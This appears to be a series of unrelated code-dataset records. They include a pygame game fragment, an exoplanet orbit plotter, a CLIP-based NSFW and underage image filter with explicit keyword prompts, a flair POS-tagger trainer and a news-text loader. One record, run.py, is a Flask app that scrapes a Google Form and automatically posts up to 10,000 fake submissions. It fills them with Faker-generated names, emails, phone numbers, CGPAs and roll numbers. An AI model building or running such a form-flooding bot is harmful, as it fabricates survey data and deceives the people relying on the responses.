range(len(get_1)):\n if score >= int(get_1[i]):\n for j in range(4, i, -1):\n get_2[j] = get_2[j-1]\n get_2[i] = f'{USERNAME} : {score}'\n print(get_2)\n f = open('records_new.txt', 'w')\n for m in range(5):\n f.write(f'{get_2[m]}\\n')\n f.close()\n sys.exit()\n\n\n# Check whether a click hit any of the targets\ndef click(eve):\n global score, r1, r2, r3, r4, r6\n global circle1_x, circle2_x, circle3_x, circle4_x, circle5_x\n global circle1_y, circle2_y, circle3_y, circle4_y, circle5_y\n xt, yt = eve.pos\n if ((xt-circle1_x)**2 + (yt-circle1_y)**2)**(1/2) <= r1:\n score += 1\n if ((xt-circle2_x)**2 + (yt-circle2_y)**2)**(1/2) <= r2:\n score += 1\n if ((xt-circle3_x)**2 + (yt-circle3_y)**2)**(1/2) <= r3:\n score += 1\n if ((xt-circle4_x)**2 + (yt-circle4_y)**2)**(1/2) <= r4:\n score += 1\n if ((xt-circle5_x)**2 + (yt-circle5_y)**2)**(1/2) <= r6:\n score += 3\n\n\n\nif __name__ == '__main__':\n start_time = time.time()\n main()\n pygame.quit()\n","sub_path":"lab5/game_1.py","file_name":"game_1.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"300673481","text":"# -.- coding:latin1 -.-\r\n# @author: Nicolas\r\n\"\"\"Ce programme trace la trajectoire en 2D de différentes exoplanètes autour\r\nde leur étoile correspondante et effectue quelques vérifications en trouvant\r\ndes résultats facilement prévisibles.\"\"\"\r\n\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\ndef positionExo(orbite, masseEtoile, temps):\r\n \"\"\"Cette fonction renvoie la position en 2D d'une exoplanète en\r\n orbite autour de son étoile si on lui fournit les paramètres de\r\n l'orbite qu'on cherche à calculer en agrument.\r\n orbite : Paramètres de l'orbite de l'exoplanète (ndarray contenant,\r\n dans l'ordre, le demi-grand axe de l'orbite, son excentricité et \r\n son anomalie moyenne au début de son parcours)\r\n temps : Temps où on veut mesurer la position (ndarray)\r\n masseEtoile : Masse de l'étoile de l'exoplanète (int)\r\n \"\"\"\r\n temps = np.atleast_1d(temps)\r\n # On transforme un temps qui aurait été entré comme un scalaire en ndarray\r\n demiGrandAxe, excentricite, anomalieMoyenneDepart = 
orbite\r\n # On déballe les paramètres contenu dans le ndarray orbite\r\n\r\n periode = np.sqrt(demiGrandAxe ** 3 / masseEtoile)\r\n # On trouve la période de l'orbite\r\n anomalieMoyenne = anomalieMoyenneDepart + 2 * np.pi * temps / periode\r\n # On trouve l'anomalie moyenne au temps recherché\r\n\r\n anomalieExcentrique = np.where(anomalieMoyenne % (2 * np.pi) < np.pi,\r\nanomalieMoyenne + excentricite / 2, anomalieMoyenne - excentricite / 2)\r\n # On trouve la valeur de départ pour le calcul de l'anomalie excentrique\r\n\r\n precision = np.ones(anomalieExcentrique.size)\r\n # On s'assure de faire la première itération\r\n\r\n actifs = np.ones(precision.size, dtype=bool)\r\n\r\n \"\"\"On définit un ndarray qui tiendra le compte des anomalie excentriques\r\n ayant la précision exigée\"\"\"\r\n\r\n iActifs, = actifs.nonzero()\r\n\r\n \"\"\"On définit un ndarray qui tiendra le compte des indices des anomalies\r\n excentriques qui manquent encore de précision\"\"\"\r\n\r\n while iActifs.size != 0:\r\n\r\n \"\"\"On continue les calculs jusqu'à ce qu'on aille la précision voulue\r\n pour chaque valeur d'anomalie excentrique recherchée\"\"\"\r\n\r\n dAnomalieExcentrique = -(anomalieMoyenne[iActifs] -\r\nanomalieExcentrique[iActifs] + excentricite * \r\nnp.sin(anomalieExcentrique[iActifs])) / (-1 + excentricite * \r\nnp.cos(anomalieExcentrique[iActifs]))\r\n \r\n \"\"\"On calcule dans un ndarray lee nouvelles différences entre les\r\n valeurs d'anomalies excentriques en utilisant la méthode de Newton,\r\n soit en évaluant le rapport entre la fonction dont on recherche le\r\n zéro et sa dérivée au point calculé précédemment\"\"\"\r\n\r\n anomalieExcentrique[iActifs] += dAnomalieExcentrique\r\n # On modifie les anomalies excentriques qui ont besoin de l'être\r\n precision[iActifs] = abs(dAnomalieExcentrique)\r\n # On modifie la précision des anomalies qu'on a nouvellement calculé\r\n\r\n actifs[iActifs] = np.where(precision[iActifs] > 1e-12, True, False)\r\n\r\n \"\"\"On met à jour quelles anomalies excentriques doivent être\r\n recalculées\"\"\"\r\n\r\n iActifs, = actifs.nonzero()\r\n\r\n \"\"\"On met à jour les indices des anomalies excentriques qui manquent \r\n encore de précision\"\"\"\r\n\r\n distanceEtoile = demiGrandAxe * (1 - excentricite * \r\nnp.cos(anomalieExcentrique))\r\n # On calcule la distance entre l'étoile et l'exoplanète\r\n\r\n anomalieVraie = 2 * np.arctan2(np.sqrt(1 - excentricite) * \r\nnp.cos(anomalieExcentrique / 2), np.sqrt(1 + excentricite) *\r\nnp.sin(anomalieExcentrique / 2))\r\n # On calcule l'anomalie vraie au temps recherché\r\n\r\n positionX0 = distanceEtoile * np.cos(anomalieVraie)\r\n # On trouve la position en x de l'exoplanète aux temps recherchés\r\n positionY0 = distanceEtoile * np.sin(anomalieVraie)\r\n # On trouve la position en y de l'exoplanète aux temps recherchés\r\n\r\n return positionX0, positionY0\r\n\r\nplt.figure(0)\r\n# On crée la première figure\r\n\r\nmasseEtoile = 1\r\ndemiGrandAxe = 1\r\nexcentricite = [0, 0.5, 0.8]\r\nanomalieMoyenneDepart = 0\r\ntemps = np.linspace(0, 1, 1001)\r\n# On définit les paramètres de départ\r\niTempsPointe = np.arange(0, 1001, 100)\r\n# On définit un ndarray avec les indices de temps où on doit ajouter un point\r\n\r\nplt.axhline(ls='dotted')\r\nplt.axvline(ls='dotted')\r\nplt.xlabel('Position en x (UA)')\r\nplt.ylabel('Position en y (UA)')\r\nplt.axis('equal')\r\n# On ajuste les paramètres esthétiques du graphique\r\n\r\nfor i in excentricite:\r\n orbite = np.array([demiGrandAxe, i, anomalieMoyenneDepart])\r\n # 
On définit les paramètres de départ pour la courbe qu'on cherche à tracer\r\n\r\n positionX0, positionY0 = positionExo(orbite, masseEtoile, temps)\r\n # On trouve la position de l'exoplanète pour tous les temps demandés\r\n\r\n plt.plot(positionX0, positionY0, '-')\r\n plt.plot(positionX0[iTempsPointe], positionY0[iTempsPointe], '.')\r\n # On met les tracés qu'on désire sur le graphique pour la courbe actuelle\r\n\r\nplt.savefig('Laboratoire7-figureQ2-1.png')\r\n\r\nplt.figure(1)\r\n# On crée la deuxième figure\r\n\r\nexcentricite = 0.5\r\nanomalieMoyenneDepart = [0, np.pi / 2, np.pi]\r\n# On définit les paramètres qui changent entre les deux graphiques\r\n\r\nplt.axhline(ls='dotted')\r\nplt.axvline(ls='dotted')\r\nplt.xlabel('Position en x (UA)')\r\nplt.ylabel('Position en y (UA)')\r\nplt.axis('equal')\r\n# On ajuste les paramètres esthétiques du graphique\r\n\r\nfor i in anomalieMoyenneDepart:\r\n orbite = np.array([demiGrandAxe, excentricite, i])\r\n # On définit les paramètres de départ pour la courbe qu'on cherche à tracer\r\n\r\n positionX0, positionY0 = positionExo(orbite, masseEtoile, temps)\r\n # On trouve la position de l'exoplanète pour tous les temps demandés\r\n\r\n plt.plot(positionX0, positionY0, '-')\r\n plt.plot(positionX0[iTempsPointe], positionY0[iTempsPointe], '.')\r\n # On met les tracés qu'on désire sur le graphique pour la courbe actuelle\r\n\r\nplt.savefig('Laboratoire7-figureQ2-2.png')\r\n\r\nplt.figure(2)\r\n# On crée la troisième figure\r\n\r\nmasseEtoile = [1, 0.25]\r\nanomalieMoyenneDepart = 0\r\n# On définit les paramètres qui changent entre les deux graphiques\r\n\r\nplt.axhline(ls='dotted')\r\nplt.axvline(ls='dotted')\r\nplt.xlabel('Position en x (UA)')\r\nplt.ylabel('Position en y (UA)')\r\nplt.axis('equal')\r\n# On ajuste les paramètres esthétiques du graphique\r\n\r\nfor i in masseEtoile:\r\n orbite = np.array([demiGrandAxe, excentricite, anomalieMoyenneDepart])\r\n # On définit les paramètres de départ pour la courbe qu'on cherche à tracer\r\n\r\n positionX0, positionY0 = positionExo(orbite, i, temps)\r\n # On trouve la position de l'exoplanète pour tous les temps demandés\r\n\r\n plt.plot(positionX0, positionY0, '-')\r\n plt.plot(positionX0[iTempsPointe], positionY0[iTempsPointe], '.')\r\n # On met les tracés qu'on désire sur le graphique pour la courbe actuelle\r\n\r\nplt.savefig('Laboratoire7-figureQ2-3.png')\r\n\r\nplt.show()","sub_path":"PHY1234/Laboratoire7-codesQ2.py","file_name":"Laboratoire7-codesQ2.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631653992","text":"import clip\nimport time\nimport torch\nimport pickle\nfrom PIL import Image\nfrom multiprocessing import cpu_count\nfrom multiprocessing.queues import JoinableQueue\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nclass CLIPDataset(torch.utils.data.Dataset):\n def __init__(self, dataframe, preprocess):\n self.dataframe = dataframe\n self.image_transform = preprocess\n self.tokenizer = clip.tokenize\n\n def __len__(self):\n return len(self.dataframe)\n\n def __getitem__(self, index):\n row = self.dataframe.iloc[index]\n return (\n self.image_transform(Image.open(row[\"PATH\"])),\n self.tokenizer(row[\"TEXT\"], truncate_text=True)[0],\n )\n\nclass CLIP:\n def __init__(self):\n self.model, self.preprocess = clip.load(\"ViT-B/32\", device=device, jit=False)\n self.cosine_similarity = torch.nn.CosineSimilarity(dim=1, eps=1e-6)\n with torch.no_grad():\n self.categories = 
self.model.encode_text(clip.tokenize([\"neutral\",\"selfie\", \"illustration, drawing\", \"toys, play, kids, children\", \"teddy bear, puppet\", \"animal, bird, mammal, insect\", \"fashion, clothes\", \"logo, commercial, ad, advertisement\", \"drawing, painting\",\"anime, cartoon\",\"comedy, fun\",\"romance, love story\",\"thriller, suspense, crime story\",\"action, action movie\", \"horror, monster movie\", \"documentary\", \"news, journalism\", \"entertainment\", \"talk show\", \"porn, sex, sperm, nipples, breats, tits, boops, penis, dick, cock, clitoris, vagina, fuck, lust, horny, sexual, lick, licking\", \"porn, sex, sperm, nipples\", \"porn, sex, sperm, penis, dick, cock\", \"nipples, breats, tits, boops, sexy\", \"penis, dick, cock\", \"clitoris, vagina\", \"sex, fuck, lust, horny, sexual, lick, licking\", \"porn, sex, sexy\",\"sexy, hot\",\"sperm, skin\",\"lust, horny, sexual\",\"lick, licking, body\", \"anime, hentai, sexy\", \"cartoon, sexy, sex\", \"hentai\", \"anime, sexy, breasts\", \"hentai\"]).to(device))\n self.underaged_categories = self.model.encode_text(clip.tokenize([\"teenager, teen\", \"kid, child, teenager, teen, baby or toddler, underaged, little girl, little boy\", \"kid, child, little girl, little boy\", \"baby, toddler\",\"adult, woman, man, grownup, grown person,full-aged of legal age\",\"full-aged, of legal age, adult\",\"woman, man\",\"adult, woman, man, grownup, grown person,full-aged of legal age\"]).to(device))\n self.animal_categories = self.model.encode_text(clip.tokenize([\"lifeless object, thing\", \"thing, object\", \"material\", \"furniture\",\"wall\", \"house\", \"tree\", \"wood\",\"ground\",\"industry\", \"table\", \"bed\", \"tool\", \"dress, clothes\", \"door\", \"chair\", \"rock, stone\", \"human\", \"man\", \"woman\", \"man, woman\", \"animal\",\"cat\",\"dog\", \"cow\", \"pig\", \"goat\", \"sheep\", \"elephant\", \"horse\", \"horse, elephant, pig, dog, cat, sheep, goat, animal\", \"life\", \"wildlife\"]).to(device))\n\n def similarity_imgalt(self, image_tensor, text_tokens):\n with torch.no_grad():\n image_features = self.model.encode_image(image_tensor.to(device)).float()\n text_features = self.model.encode_text(text_tokens.to(device)).float()\n similarity = self.cosine_similarity(image_features, text_features).tolist()\n\n image_features = image_features.detach().cpu().numpy()\n return image_features, similarity\n\n def preprocess_images(self, df):\n ret_image_features = []\n ret_similarity = []\n batch_size = 256 if device == \"cuda\" else 8\n dataset = CLIPDataset(df, self.preprocess)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=int(2*cpu_count()/3), pin_memory=True)\n for tensors, tokens in dataloader:\n image_features, similarities = self.similarity_imgalt(tensors, tokens)\n ret_image_features.extend(image_features)\n ret_similarity.extend(similarities)\n return ret_image_features, ret_similarity\n\n def prob(self, image_features, text_features):\n text_features = text_features.float()\n image_features = torch.as_tensor(image_features).to(device, dtype=torch.float32)\n image_features /= image_features.norm(dim=-1, keepdim=True)\n text_features /= text_features.norm(dim=-1, keepdim=True)\n\n # cosine similarity as logits\n similarity = (100.0 * image_features @ text_features.T).softmax(dim=-1)\n _, indices = similarity.topk(2)\n return indices\n\n\nclip_filter = CLIP()\n\n\ndef df_clipfilter(df):\n sim_threshold = 0.3\n underaged_text = [\"teen\", \"kid\", \"child\", \"baby\"]\n\n 
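# prob() above returns the *indices* of the two most similar prompts, not\n # probabilities: indices 0-18 of clip_filter.categories are the safe prompts\n # and 19+ the NSFW ones, hence the \"< 19\" / \">= 19\" checks below; the\n # underaged (< 4) and animal (> 20) checks follow the same index convention.\n 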
img_embedding, similarities = clip_filter.preprocess_images(df)\n tmp_embed = []\n\n for i, img_embed in enumerate(img_embedding):\n if similarities[i] < sim_threshold:\n df.at[i, 'dropped'] = True\n continue\n\n # get most similar categories\n nsfw_prob = clip_filter.prob(img_embed, clip_filter.categories)\n df.at[i, \"NSFW\"] = \"UNSURE\"\n df.at[i, \"similarity\"] = similarities[i]\n if nsfw_prob[0] < 19 and nsfw_prob[1] < 19:\n df.at[i, \"NSFW\"] = \"UNLIKELY\"\n tmp_embed.append(img_embed)\n df.at[i, 'dropped'] = False\n continue\n elif nsfw_prob[0] >= 19 and nsfw_prob[1] >= 19:\n df.at[i, \"NSFW\"] = \"NSFW\"\n\n underage_prob = clip_filter.prob(img_embed, clip_filter.underaged_categories)\n if underage_prob[0] < 4 or underage_prob[1] < 4 or any(x in df.at[i, \"TEXT\"] for x in underaged_text):\n df.at[i, 'dropped'] = True\n continue\n\n animal_prob = clip_filter.prob(img_embed, clip_filter.animal_categories)\n if animal_prob[0] > 20:\n df.at[i, 'dropped'] = True\n continue\n tmp_embed.append(img_embed)\n df.at[i, 'dropped'] = False\n \n df = df[df[\"dropped\"] != True]\n df.reset_index(drop=True, inplace=True)\n return tmp_embed, df\n\n\ndef df_tfrecords(df, output_fname):\n import tensorflow as tf\n from tfr_image.utils import bytes_feature, int64_feature\n\n def image_to_tfexample(sample_id, image_data, image_format, height, width, caption):\n return tf.train.Example(\n features=tf.train.Features(\n feature={\n \"sampleID\": bytes_feature(sample_id),\n \"image\": bytes_feature(image_data),\n \"format\": bytes_feature(image_format),\n \"label\": bytes_feature(caption),\n \"height\": int64_feature(height),\n \"width\": int64_feature(width),\n }\n )\n )\n\n with tf.io.TFRecordWriter(output_fname) as tfrecord_writer:\n for i in range(len(df)):\n df_image = df.iloc[i]\n image_fname = df_image[\"PATH\"]\n file_type = image_fname.split(\".\")[-1]\n with tf.io.gfile.GFile(image_fname, \"rb\") as f:\n image_data = f.read()\n example = image_to_tfexample(\n str(df_image[\"SAMPLE_ID\"]).encode(\"utf_8\"),\n image_data,\n file_type.encode(\"utf_8\"),\n df_image[\"HEIGHT\"],\n df_image[\"WIDTH\"],\n df_image[\"TEXT\"].encode(\"utf_8\"),\n )\n tfrecord_writer.write(example.SerializeToString())\n\n\ndef filter(df, out_fname, output_folder, errors: JoinableQueue):\n results = []\n #start0 = start = time.time()\n img_embeddings, dff = df_clipfilter(df)\n dff.to_csv(f\"{output_folder}{out_fname}.csv\", index=False, sep=\"|\")\n\n #count results for each worker from resulting dff\n dff[\"shard\"] = dff.apply(lambda row: str(row.PATH).split(\"/\")[1].replace(\"-\",\".\"), axis=1)\n results = dff[\"shard\"].value_counts()\n #print(f\"CLIP ran in {round(time.time()-start,2)}\")\n #start = time.time()\n img_embeds_sampleid = {}\n for i, img_embed_it in enumerate(img_embeddings):\n dfid_index = dff.at[i, \"SAMPLE_ID\"]\n img_embeds_sampleid[str(dfid_index)] = img_embed_it\n with open(f\"{output_folder}image_embedding_dict-{out_fname}.pkl\", \"wb\") as f:\n pickle.dump(img_embeds_sampleid, f)\n #print(f\"Embeddings ran in {round(time.time()-start,2)}\")\n #start = time.time()\n df_tfrecords(\n dff,\n f\"{output_folder}crawling_at_home_{out_fname}__00000-of-00001.tfrecord\",\n )\n #print(f\"Tfrecords ran in {round(time.time()-start,2)}\")\n #print(f\"Job ran in {round(time.time()-start0,2)}\")\n return len(dff), 
results","sub_path":"clip_filter.py","file_name":"clip_filter.py","file_ext":"py","file_size_in_byte":8435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163617419","text":"import numpy as np\nimport LC_model\nimport getting_data\n\ndata_tr, label_tr = getting_data.read_dir(\"./digits/trainingDigits/\", 10)\ndata_ts, label_ts = getting_data.read_dir(\"./digits/testDigits/\", 10)\n\n\nprint(\"Data loaded\")\n\ninput_unit = data_tr.shape[0]\noutput_unit = label_tr.shape[0]\n\nlamda = 0.01\n\nlc = LC_model.linearmodel(input_units=input_unit, output_units=output_unit, lamda=lamda)\n\nepoch = 128\nbatch_size = 128\n\nnum_cases = data_tr.shape[1]\n\n\nprint(\"Training begin\")\n\n\nfor step in range(epoch):\n #shuffle data done in the process of loading data\n for batch in range(0, num_cases, batch_size):\n lc.SGD(data_tr[:, batch: batch + batch_size], 0.01, label_tr[:, batch: batch + batch_size])\n if batch % batch_size == 0:\n get_logits = lc.inference(data_tr[:, batch: batch + batch_size])\n cost = lc.loss(get_logits, label_tr[:, batch: batch + batch_size])\n print(\"in batch {} the cost is: {}\".format(batch / batch_size +1, cost))\n if (step+1) % 32 == 0:\n\n rate = lc.evaluation(testing_data=data_ts, testing_labels=label_ts)\n print(\"the {} step: correct rate is {}\".format(step + 1,rate))","sub_path":"A1/linear classifier/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"463869366","text":"import os\nimport random\n\nBASE_DIR = 'financial-news-dataset/'\nBLOOMBERG_DATA_DIR = os.path.join(BASE_DIR, '20061020_20131126_bloomberg_news')\nREUTERS_DATA_DIR = os.path.join('ReutersNews106521')\n\n# @ is the encoding for digits.\nVOCABULARY = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q',\n 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', ' ', ',', '.', '$', '%', '\\'', '-', '@']\n\n\ndef get_filename():\n for root, dirs, files in os.walk(BLOOMBERG_DATA_DIR):\n for file in files:\n yield os.path.join(root, file)\n for root, dirs, files in os.walk(REUTERS_DATA_DIR):\n for file in files:\n yield os.path.join(root, file)\n\n\ndef filter_unwanted_characters(s):\n unwanted_chars = ['\\'\\'', '``', '\\n']\n for unwanted_char in unwanted_chars:\n s = s.replace(unwanted_char, ' ')\n while ' ' in s:\n s = s.replace(' ', ' ')\n s = s.replace(' ,', ',')\n s = s.replace(';', ',')\n end_tag = 'To contact the reporter'\n if end_tag in s:\n s = s[:s.index(end_tag)]\n return s\n\n\ndef filter_to_reduce_vocabulary(string):\n string = string.lower()\n output = []\n for c in string:\n if c.isdigit():\n output.append('@')\n if c in VOCABULARY:\n output.append(c)\n return ''.join(output)\n\n\ndef read(num_filenames=int(6e3), shuffle=True, debug=False):\n buffer = ''\n filename_list = sorted([v for v in get_filename()])\n if shuffle:\n random.shuffle(filename_list)\n filename_list = filename_list[:num_filenames]\n for i, file in enumerate(filename_list):\n filename = file.split('/')[-1]\n if debug:\n print(i, filename)\n if '-' in filename:\n with open(file, 'r', encoding='utf-8', errors='ignore') as f:\n new_lines = f.readlines()\n if len(new_lines) > 0:\n st = max([t[0] for t in enumerate(new_lines) if t[1].startswith('--')]) + 1\n new_str = ''.join([v for v in new_lines[st:] if not v.startswith('--') and '@' not in v]).strip()\n new_str = filter_unwanted_characters(new_str)\n new_str = 
filter_to_reduce_vocabulary(new_str)\n if debug:\n print(new_str)\n buffer += new_str\n return buffer\n\n\nif __name__ == '__main__':\n read(debug=True)\n","sub_path":"data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"39328327","text":"from flair.data import Sentence, TaggedCorpus, Token\nfrom flair.data_fetcher import NLPTaskDataFetcher, NLPTask\nfrom flair.embeddings import TokenEmbeddings, WordEmbeddings, StackedEmbeddings, CharLMEmbeddings\nfrom typing import List\n\nsentences_train: List[Sentence] = NLPTaskDataFetcher.read_conll_ud(\"universal-dependencies-1.2/UD_German/de-ud-train.conllu\")\nsentences_dev: List[Sentence] = NLPTaskDataFetcher.read_conll_ud(\"universal-dependencies-1.2/UD_German/de-ud-dev.conllu\")\nsentences_test: List[Sentence] = NLPTaskDataFetcher.read_conll_ud(\"universal-dependencies-1.2/UD_German/de-ud-test.conllu\")\n\ncorpus: TaggedCorpus = TaggedCorpus(sentences_train, sentences_dev,\n sentences_test)\n\ntag_type = 'upos'\n\ntag_dictionary = corpus.make_tag_dictionary(tag_type=tag_type)\n\nembedding_types: List[TokenEmbeddings] = [\n WordEmbeddings('de-fasttext'),\n CharLMEmbeddings('german-forward'),\n CharLMEmbeddings('german-backward'),\n]\n\nembeddings: StackedEmbeddings = StackedEmbeddings(embeddings=embedding_types)\n\nfrom flair.models import SequenceTagger\n\ntagger: SequenceTagger = SequenceTagger(hidden_size=256,\n embeddings=embeddings,\n tag_dictionary=tag_dictionary,\n tag_type=tag_type,\n use_crf=True)\n\nfrom flair.trainers import SequenceTaggerTrainer\n\ntrainer: SequenceTaggerTrainer = SequenceTaggerTrainer(tagger, corpus,\n test_mode=True)\n\ntrainer.train('resources/taggers/ud-german',\n learning_rate=0.1,\n mini_batch_size=32,\n max_epochs=500)\n","sub_path":"ud-german/train_1.py","file_name":"train_1.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"174393391","text":"import csv\n\nimport numpy as np\n\n#shuffle\nimport random\n\ndef read_csv(file_link):\n with open(file_link, 'r', encoding='utf-8') as csvfile:\n return np.array([row for row in csv.DictReader(csvfile)])\n\n# 製作運算矩陣\ndef parse_data(data,x_targets, y_target='CITY'):\n x = np.array([[float(row[_element]) for _element in x_targets ] for row in data ])\n y = np.array([row[y_target] for row in data])\n unique = np.unique(y)\n y = np.array([list(unique).index(row) for row in y])\n\n return x,y,unique\n\n# def onehotencoding(y):\n# unique = np.unique(y)\n# y_one = np.array([[1 if row == onehot else 0 for onehot in unique] for row in y])\n# return y_one\n\n# def min_max_scaler(x_1):\n# for i in range(x_1.shape[1]):\n# x_1[:,i] = (x_1[:,i]-x_1[:,i].min())/(x_1[:,i].max()-x_1[:,i].min())\n# return x_1\n\n\n\ndef load(size = 10000,seed = 20191127):\n random.seed(seed)\n rows = read_csv('regionwide.csv')\n random.shuffle(rows)\n\n if size != 'max':\n rows = rows[:size]\n features = ['LON','LAT']\n data = np.array(rows)\n x, y, unique = parse_data(data,features)\n # x = xx(x)\n # t = onehotencoding(y)\n return x, y, unique","sub_path":"jmodel/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"647988611","text":"import http.client\r\nimport urllib.request\r\nimport random\r\nfrom bs4 import BeautifulSoup\r\nfrom 
time import sleep\r\nfrom flask import Flask, request, render_template, redirect, url_for\r\nfrom faker import Faker\r\nfake=Faker()\r\nfake_IN=Faker('hi_IN')\r\n\r\napp = Flask(__name__)\r\nlink_short=str()\r\nnum=int()\r\nfinal_ans=dict()\r\nform_entry=list()\r\nrand=list()\r\nquestion_list=list()\r\n\r\n@app.route('/', methods=[\"GET\",\"POST\"])\r\ndef index():\r\n global link_short, num, final_ans, form_entry, rand, question_list\r\n if request.method==\"POST\":\r\n link = request.form['link']\r\n num = request.form['num']\r\n if int(num)>10000:\r\n num=\"10000\"\r\n print(num)\r\n linkarr = link.split('/')\r\n link_short = linkarr[6]\r\n page=urllib.request.urlopen(link)\r\n soup=BeautifulSoup(page, \"html.parser\")\r\n rand=[]\r\n s = soup.find(\"div\", {\"class\": \"freebirdFormviewerViewHeaderTitle exportFormTitle freebirdCustomFont\"})\r\n title = s.get_text(separator=\"\\n\")\r\n \r\n \r\n def input_entries():\r\n questions = soup.find_all(\"div\", {\"class\": \"freebirdFormviewerViewItemsItemItem\"})\r\n \r\n for q in questions[0:]:\r\n \r\n result = q.get_text(separator=\"\\n\")\r\n question_list.append(result)\r\n \r\n attributes = q.find_all(\"input\")\r\n #user_ans=input(\"Enter your choice: \")\r\n \r\n for attribute in attributes:\r\n try:\r\n entry_token=str(attribute.attrs['name'])\r\n if(entry_token[-1].isdigit()):\r\n token=str(attribute.attrs['name'])\r\n form_entry.append(token)\r\n break\r\n except:\r\n print(\"\")\r\n \r\n # if user_ans.startswith('!random'):\r\n # rand.append(result.split('\\n'))\r\n #final_ans[token]=user_ans\r\n \r\n input_entries()\r\n question_length = len(question_list)\r\n\r\n return render_template(\"sent.html\",**locals(), question_list = question_list)\r\n else:\r\n return render_template(\"index.html\", **locals())\r\n\r\n@app.route('/send', methods=[\"GET\",\"POST\"])\r\ndef send():\r\n global link_short ,num, form_entry, rand, question_list\r\n if request.method==\"POST\":\r\n form_entry_data = request.form.getlist('user_ans')\r\n print(form_entry)\r\n print(form_entry_data)\r\n print(num)\r\n def post(link,num):\r\n headers = {\r\n 'content-type': \"multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\",\r\n 'cache-control': \"no-cache\",\r\n 'postman-token': \"f7281180-f919-b589-709a-a77457e89d08\"\r\n }\r\n\r\n for x in range(int(num)):\r\n conn = http.client.HTTPSConnection(\"docs.google.com\")\r\n rand_ctr=0\r\n payload=\"------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n for i in range(len(form_entry)):\r\n #print(\"ans= \"+str(faker_input((form_entry_data[i])[6:])))\r\n if(form_entry_data[i].startswith('!cgpa.')):\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+str(random.randrange(int((form_entry_data[i])[6:])*10,100,1)/10)+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n elif(form_entry_data[i].startswith('!roll.')):\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+form_entry_data[i][6:]+str(random.randrange(10000,99999,1))+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n elif(form_entry_data[i].startswith('!fake.')):\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+str(faker_input((form_entry_data[i])[6:]))+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n elif(form_entry_data[i]=='!random'):\r\n rand.append(question_list[i].split('\\n'))\r\n #print(rand)\r\n #print(\"RANDOM START\")\r\n 
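# rand[rand_ctr] holds the question text split into lines: index 0 is the\r\n # question text itself, so randrange starts at 1 to pick only among the\r\n # answer options.\r\n 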
#print(str(rand[rand_ctr][random.randrange(1,len(rand[rand_ctr]),1)]))\r\n #print(\"RANDOM END\")\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+str(rand[rand_ctr][random.randrange(1,len(rand[rand_ctr]),1)])+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n rand_ctr=rand_ctr+1\r\n else:\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+str(form_entry_data[i])+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n payload+=\"--\"\r\n conn.request(\"POST\", \"/forms/u/0/d/e/\"+link_short+\"/formResponse\", payload, headers)\r\n #sleep(1)\r\n #res = conn.getresponse()\r\n print('.')\r\n #data = res.read()\r\n final_ans.clear()\r\n form_entry.clear()\r\n rand.clear()\r\n question_list.clear()\r\n\r\n\r\n def faker_input(type):\r\n if(type==\"name\"):\r\n return fake.name()\r\n if(type==\"number\"):\r\n return ('9'+ fake.msisdn()[4:])\r\n if(type==\"word\"):\r\n return fake.word()\r\n if(type==\"sentence\"):\r\n return fake.sentence()\r\n if(type==\"email\"):\r\n return fake.email()\r\n else:\r\n return type\r\n post(link_short,num)\r\n return redirect('/')\r\n else:\r\n return render_template(\"index.html\",**locals())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='127.0.0.1', port='5000')\r\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"464392569","text":"\"\"\"\nMake adversarial versions of CUB\n\"\"\"\n\nfrom PIL import Image\nimport os\nfrom glob import glob\nimport numpy as np\nimport random\nimport json\n\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\n\ndef get_places(fname):\n \"\"\"\n Load list of places imgs and classes into dictionary\n \"\"\"\n places_dict = defaultdict(list)\n with open(fname, 'r') as f:\n for line in f:\n img_name, n = line.split()\n places_dict[int(n)].append(img_name)\n return places_dict\n\n\ndef crop_and_resize(source_img, target_img):\n \"\"\"\n Make source_img exactly the same as 